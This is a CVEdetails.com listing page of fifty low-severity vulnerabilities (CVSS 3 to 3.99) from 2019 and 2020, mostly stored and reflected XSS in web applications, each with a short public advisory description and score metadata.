CVEdetails.com the ultimate security vulnerability data source
(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)
Log In   Register
Vulnerability Feeds & WidgetsNew   www.itsecdb.com  

Security Vulnerabilities (CVSS score between 3 and 3.99)

Press ESC to close
# CVE ID CWE ID # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity Authentication Conf. Integ. Avail.
1951 CVE-2019-19756 532 2020-03-13 2020-03-18
3.6
None Local Low Not required Partial Partial None
An internal product security audit of Lenovo XClarity Administrator (LXCA) discovered Windows OS credentials, used to perform driver updates of managed systems, being written to a log file in clear text. This only affects LXCA version 2.6.0 when performing a Windows driver update. Affected logs are only accessible to authorized users in the First Failure Data Capture (FFDC) service log and log files on LXCA.
1952 CVE-2019-19742 79 XSS 2019-12-18 2021-04-23
3.5
None Remote Medium ??? None Partial None
On D-Link DIR-615 devices, the User Account Configuration page is vulnerable to blind XSS via the name field.
1953 CVE-2019-19693 200 Exec Code +Info 2019-12-20 2020-01-02
3.6
None Local Low Not required Partial None Partial
The Trend Micro Security 2020 consumer family of products contains a vulnerability that could allow a local attacker to disclose sensitive information or to create a denial-of-service condition on affected installations. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
1954 CVE-2019-19687 522 +Info 2019-12-09 2019-12-20
3.5
None Remote Medium ??? Partial None None
OpenStack Keystone 15.0.0 and 16.0.0 is affected by Data Leakage in the list credentials API. Any user with a role on a project is able to list any credentials with the /v3/credentials API when enforce_scope is false. Users with a role on a project are able to view any other users' credentials, which could (for example) leak sign-on information for Time-based One Time Passwords (TOTP). Deployments with enforce_scope set to false are affected. (There will be a slight performance impact for the list credentials API once this issue is fixed.)
1955 CVE-2019-19682 79 XSS 2019-12-09 2019-12-10
3.5
None Remote Medium ??? None Partial None
nopCommerce through 4.20 allows XSS in the SaveStoreMappings of the components \Presentation\Nop.Web\Areas\Admin\Controllers\NewsController.cs and \Presentation\Nop.Web\Areas\Admin\Controllers\BlogController.cs via Body or Full to Admin/News/NewsItemEdit/[id] Admin/Blog/BlogPostEdit/[id]. NOTE: the vendor reportedly considers this a "feature" because the affected components are an HTML content editor.
1956 CVE-2019-19679 79 XSS 2019-12-09 2019-12-11
3.5
None Remote Medium ??? None Partial None
In "Xray Test Management for Jira" prior to version 3.5.5, remote authenticated attackers can cause XSS in the Pre-Condition Summary entry point via the summary field of a Create Pre-Condition action for a new Test Issue.
1957 CVE-2019-19678 79 XSS 2019-12-09 2019-12-11
3.5
None Remote Medium ??? None Partial None
In "Xray Test Management for Jira" prior to version 3.5.5, remote authenticated attackers can cause XSS in the generic field entry point via the Generic Test Definition field of a new Generic Test issue.
1958 CVE-2019-19615 79 Exec Code XSS 2020-03-16 2020-03-19
3.5
None Remote Medium ??? None Partial None
Multiple XSS vulnerabilities exist in the Backup & Restore module \ v14.0.10.2 through v14.0.10.7 for FreePBX, as shown at /admin/config.php?display=backup on the FreePBX Administrator web site. An attacker can modify the id parameter of the backup configuration screen and embed malicious XSS code via a link. When another user (such as an admin) clicks the link, the XSS payload will render and execute in the context of the victim user's account.
1959 CVE-2019-19612 79 XSS 2020-03-16 2020-06-25
3.5
None Remote Medium ??? None Partial None
An issue was discovered in Halvotec RaQuest 10.23.10801.0. Several features of the application allow stored Cross-site Scripting (XSS). Fixed in Release 24.2020.20608.0.
1960 CVE-2019-19596 79 XSS 2019-12-05 2019-12-06
3.5
None Remote Medium ??? None Partial None
GitBook through 2.6.9 allows XSS via a local .md file.
1961 CVE-2019-19552 79 Exec Code XSS 2019-12-06 2019-12-10
3.5
None Remote Medium ??? None Partial None
In userman 13.0.76.43 through 15.0.20 in Sangoma FreePBX, XSS exists in the user management screen of the Administrator web site, i.e., the/admin/config.php?display=userman URI. An attacker with sufficient privileges can edit the Display Name of a user and embed malicious XSS code. When another user (such as an admin) visits the main User Management screen, the XSS payload will render and execute in the context of the victim user's account.
1962 CVE-2019-19551 79 XSS 2019-12-06 2019-12-11
3.5
None Remote Medium ??? None Partial None
In userman 13.0.76.43 through 15.0.20 in Sangoma FreePBX, XSS exists in the User Management screen of the Administrator web site. An attacker with access to the User Control Panel application can submit malicious values in some of the time/date formatting and time-zone fields. These fields are not being properly sanitized. If this is done and a user (such as an admin) visits the User Management screen and views that user's profile, the XSS payload will render and execute in the context of the victim user's account.
1963 CVE-2019-19542 79 XSS 2019-12-26 2019-12-30
3.5
None Remote Medium ??? None Partial None
The ListingPro theme before v2.0.14.2 for WordPress has Persistent XSS via the Good For field on the new listing submit page.
1964 CVE-2019-19541 79 XSS 2019-12-26 2020-01-02
3.5
None Remote Medium ??? None Partial None
The ListingPro theme before v2.0.14.2 for WordPress has Persistent XSS via the Best Day/Night field on the new listing submit page.
1965 CVE-2019-19514 79 XSS 2020-05-05 2020-05-07
3.5
None Remote Medium ??? None Partial None
Ayision Ays-WR01 v28K.RPT.20161224 devices allow stored XSS in basic repeater settings via an SSID.
1966 CVE-2019-19500 79 XSS 2020-04-15 2020-04-17
3.5
None Remote Medium ??? None Partial None
Matrix42 Workspace Management 9.1.2.2765 and below allows stored XSS via unfiltered description parameters, as demonstrated by the comment field of a special order for individual software.
1967 CVE-2019-19497 79 XSS 2019-12-17 2019-12-20
3.5
None Remote Medium ??? None Partial None
MDaemon Email Server 17.5.1 allows XSS via the filename of an attachment to an email message.
1968 CVE-2019-19496 79 XSS 2019-12-02 2019-12-11
3.5
None Remote Medium ??? None Partial None
Alfresco Enterprise before 5.2.5 allows stored XSS via an uploaded HTML document.
1969 CVE-2019-19461 79 XSS 2020-03-16 2020-03-19
3.5
None Remote Medium ??? None Partial None
Post-authentication Stored XSS in Team Password Manager through 7.93.204 allows attackers to steal other users' credentials by creating a shared password with HTML code as the title.
1970 CVE-2019-19457 79 XSS 2019-12-03 2019-12-11
3.5
None Remote Medium ??? None Partial None
SALTO ProAccess SPACE 5.4.3.0 allows XSS.
1971 CVE-2019-19441 200 +Info 2020-01-03 2020-01-07
3.3
None Local Network Low Not required Partial None None
HUAWEI P30 smart phones with versions earlier than 10.0.0.166(C00E66R1P11) have an information leak vulnerability. An attacker could send specific command in the local area network (LAN) to exploit this vulnerability. Successful exploitation may cause information leak.
1972 CVE-2019-19390 79 XSS 2020-04-15 2020-04-22
3.5
None Remote Medium ??? None Partial None
The Search parameter of the Software Catalogue section of Matrix42 Workspace Management 9.1.2.2765 and below accepts unfiltered parameters that lead to multiple reflected XSS issues.
1973 CVE-2019-19389 74 Http R.Spl. 2019-12-26 2020-08-24
3.5
None Remote Medium ??? None Partial None
JetBrains Ktor framework before version 1.2.6 was vulnerable to HTTP Response Splitting.
1974 CVE-2019-19311 79 XSS 2020-01-03 2020-01-09
3.5
None Remote Medium ??? None Partial None
GitLab EE 8.14 through 12.5, 12.4.3, and 12.3.6 allows XSS in group and profile fields.
1975 CVE-2019-19306 79 XSS 2019-11-26 2020-10-29
3.5
None Remote Medium ??? None Partial None
The Zoho CRM Lead Magnet plugin 1.6.9.1 for WordPress allows XSS via module, EditShortcode, or LayoutName.
1976 CVE-2019-19294 79 Exec Code XSS 2020-03-10 2021-04-22
3.5
None Remote Medium ??? None Partial None
A vulnerability has been identified in Control Center Server (CCS) (All versions < V1.5.0). The web interface of the Control Center Server (CCS) contains multiple stored Cross-site Scripting (XSS) vulnerabilities in several input fields. This could allow an authenticated remote attacker to inject malicious JavaScript code into the CCS web application that is later executed in the browser context of any other user who views the relevant CCS web content.
1977 CVE-2019-19291 313 2020-03-10 2021-04-22
3.5
None Remote Medium ??? Partial None None
A vulnerability has been identified in Control Center Server (CCS) (All versions < V1.5.0), SiNVR/SiVMS Video Server (All versions < V5.0.0). The FTP services of the SiVMS/SiNVR Video Server and the Control Center Server (CCS) maintain log files that store login credentials in cleartext. In configurations where the FTP service is enabled, authenticated remote attackers could extract login credentials of other users of the service.
1978 CVE-2019-19285 80 XSS 2020-12-14 2020-12-15
3.5
None Remote Medium ??? None Partial None
A vulnerability has been identified in XHQ (All Versions < 6.1). The web interface could allow injections that could lead to XSS attacks if unsuspecting users are tricked into accessing a malicious link.
1979 CVE-2019-19284 79 XSS 2020-12-14 2020-12-15
3.5
None Remote Medium ??? None Partial None
A vulnerability has been identified in XHQ (All Versions < 6.1). The web interface could allow Cross-Site Scripting (XSS) attacks if an attacker is able to modify content of particular web pages, causing the application to behave in unexpected ways for legitimate users.
1980 CVE-2019-19266 79 XSS 2020-01-06 2020-01-08
3.5
None Remote Medium ??? None Partial None
IceWarp WebMail Server 12.2.0 and 12.1.x before 12.2.1.1 (and probably earlier versions) allows XSS (issue 2 of 2) in notes for objects.
1981 CVE-2019-19222 79 XSS 2020-03-04 2020-03-05
3.5
None Remote Medium ??? None Partial None
A Stored XSS issue in the D-Link DSL-2680 web administration interface (Firmware EU_1.03) allows an authenticated attacker to inject arbitrary JavaScript code into the info.html administration page by sending a crafted Forms/wireless_autonetwork_1 POST request.
1982 CVE-2019-19210 79 XSS 2020-03-16 2020-03-18
3.5
None Remote Medium ??? None Partial None
Dolibarr ERP/CRM before 10.0.3 allows XSS because uploaded HTML documents are served as text/html despite being renamed to .noexe files.
1983 CVE-2019-19206 79 XSS 2019-11-26 2019-12-10
3.5
None Remote Medium ??? None Partial None
Dolibarr CRM/ERP 10.0.3 allows viewimage.php?file= Stored XSS due to JavaScript execution in an SVG image for a profile picture.
1984 CVE-2019-19198 79 XSS 2019-12-12 2020-03-19
3.5
None Remote Medium ??? None Partial None
The Scoutnet Kalender plugin 1.1.0 for WordPress allows XSS.
1985 CVE-2019-19196 120 DoS Overflow 2020-02-12 2020-02-25
3.3
None Local Network Low Not required None None Partial
The Bluetooth Low Energy Secure Manager Protocol (SMP) implementation on Telink Semiconductor BLE SDK versions before November 2019 for TLSR8x5x through 3.4.0, TLSR823x through 1.3.0, and TLSR826x through 3.3 devices accepts a pairing request with a key size greater than 16 bytes, allowing an attacker in radio range to cause a buffer overflow and denial of service (crash) via crafted packets.
1986 CVE-2019-19192 20 2020-02-12 2020-02-26
3.3
None Local Network Low Not required None None Partial
The Bluetooth Low Energy implementation on STMicroelectronics BLE Stack through 1.3.1 for STM32WB5x devices does not properly handle consecutive Attribute Protocol (ATT) requests on reception, allowing attackers in radio range to cause an event deadlock or crash via crafted packets.
1987 CVE-2019-19150 532 2019-12-23 2019-12-30
3.5
None Remote Medium ??? Partial None None
On versions 15.0.0-15.0.1.1, 14.1.0-14.1.2, 14.0.0-14.0.1, 13.1.0-13.1.3.1, 12.1.0-12.1.5, and 11.5.2-11.6.5.1, the BIG-IP APM system logs the client-session-id when a per-session policy is attached to the virtual server with debug logging enabled.
1988 CVE-2019-19110 79 XSS 2020-06-15 2020-06-15
3.5
None Remote Medium ??? None Partial None
The wpForo plugin 1.6.5 for WordPress allows XSS via the wp-admin/admin.php?page=wpforo-phrases s parameter.
1989 CVE-2019-19100 269 2020-04-29 2020-05-13
3.6
None Local Low Not required None Partial Partial
A privilege escalation vulnerability in the upgrade service in B&R Automation Studio versions 4.0.x, 4.1.x, 4.2.x, < 4.3.11SP, < 4.4.9SP, < 4.5.4SP, <. 4.6.3SP, < 4.7.2 and < 4.8.1 allow authenticated users to delete arbitrary files via an exposed interface.
1990 CVE-2019-19096 522 2020-04-02 2020-04-03
3.6
None Local Low Not required Partial Partial None
The Redis data structure component used in ABB eSOMS versions 6.0 to 6.0.2 stores credentials in clear text. If an attacker has file system access, this can potentially compromise the credentials' confidentiality.
1991 CVE-2019-19095 79 XSS 2020-04-02 2020-04-03
3.5
None Remote Medium ??? None Partial None
Lack of adequate input/output validation for ABB eSOMS versions 4.0 to 6.0.2 might allow an attacker to attack such as stored cross-site scripting by storing malicious content in the database.
1992 CVE-2019-19092 306 2020-04-02 2020-04-03
3.5
None Remote Medium ??? Partial None None
ABB eSOMS versions 4.0 to 6.0.3 use ASP.NET Viewstate without Message Authentication Code (MAC). Alterations to Viewstate might thus not be noticed.
1993 CVE-2019-19090 311 2020-04-02 2020-04-03
3.5
None Remote Medium ??? Partial None None
For ABB eSOMS versions 4.0 to 6.0.2, the Secure Flag is not set in the HTTP response header. Unencrypted connections might access the cookie information, thus making it susceptible to eavesdropping.
1994 CVE-2019-19085 79 XSS 2019-11-18 2019-11-20
3.5
None Remote Medium ??? None Partial None
A persistent cross-site scripting (XSS) vulnerability in Octopus Server 3.4.0 through 2019.10.5 allows remote authenticated attackers to inject arbitrary web script or HTML.
1995 CVE-2019-19002 79 XSS 2020-04-02 2020-04-03
3.5
None Remote Medium ??? None Partial None
For ABB eSOMS versions 4.0 to 6.0.2, the X-XSS-Protection HTTP response header is not set in responses from the web server. For older web browser not supporting Content Security Policy, this might increase the risk of Cross Site Scripting.
1996 CVE-2019-18994 20 DoS 2019-12-18 2019-12-31
3.5
None Remote Medium ??? None None Partial
Due to a lack of file length check, the HMIStudio component of ABB PB610 Panel Builder 600 versions 2.8.0.424 and earlier crashes when trying to load an empty *.JPR application file. An attacker with access to the file system might be able to cause application malfunction such as denial of service.
1997 CVE-2019-18993 79 XSS 2019-12-03 2019-12-16
3.5
None Remote Medium ??? None Partial None
OpenWrt 18.06.4 allows XSS via the "New port forward" Name field to the cgi-bin/luci/admin/network/firewall/forwards URI (this can occur, for example, on a TP-Link Archer C7 device).
1998 CVE-2019-18992 79 XSS 2019-12-03 2019-12-16
3.5
None Remote Medium ??? None Partial None
OpenWrt 18.06.4 allows XSS via these Name fields to the cgi-bin/luci/admin/network/firewall/rules URI: "Open ports on router" and "New forward rule" and "New Source NAT" (this can occur, for example, on a TP-Link Archer C7 device).
1999 CVE-2019-18946 384 2021-02-26 2021-03-01
3.8
None Local Network Medium ??? Partial Partial None
Micro Focus Solutions Business Manager Application Repository versions prior to 11.7.1 are vulnerable to session fixation.
2000 CVE-2019-18845 269 +Priv 2019-11-09 2020-03-18
3.6
None Local Low Not required Partial Partial None
The MsIo64.sys and MsIo32.sys drivers in Patriot Viper RGB before 1.1 allow local users (including low integrity processes) to read and write to arbitrary memory locations, and consequently gain NT AUTHORITY\SYSTEM privileges, by mapping \Device\PhysicalMemory into the calling process via ZwOpenSection and ZwMapViewOfSection.
CVE is a registred trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registred trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.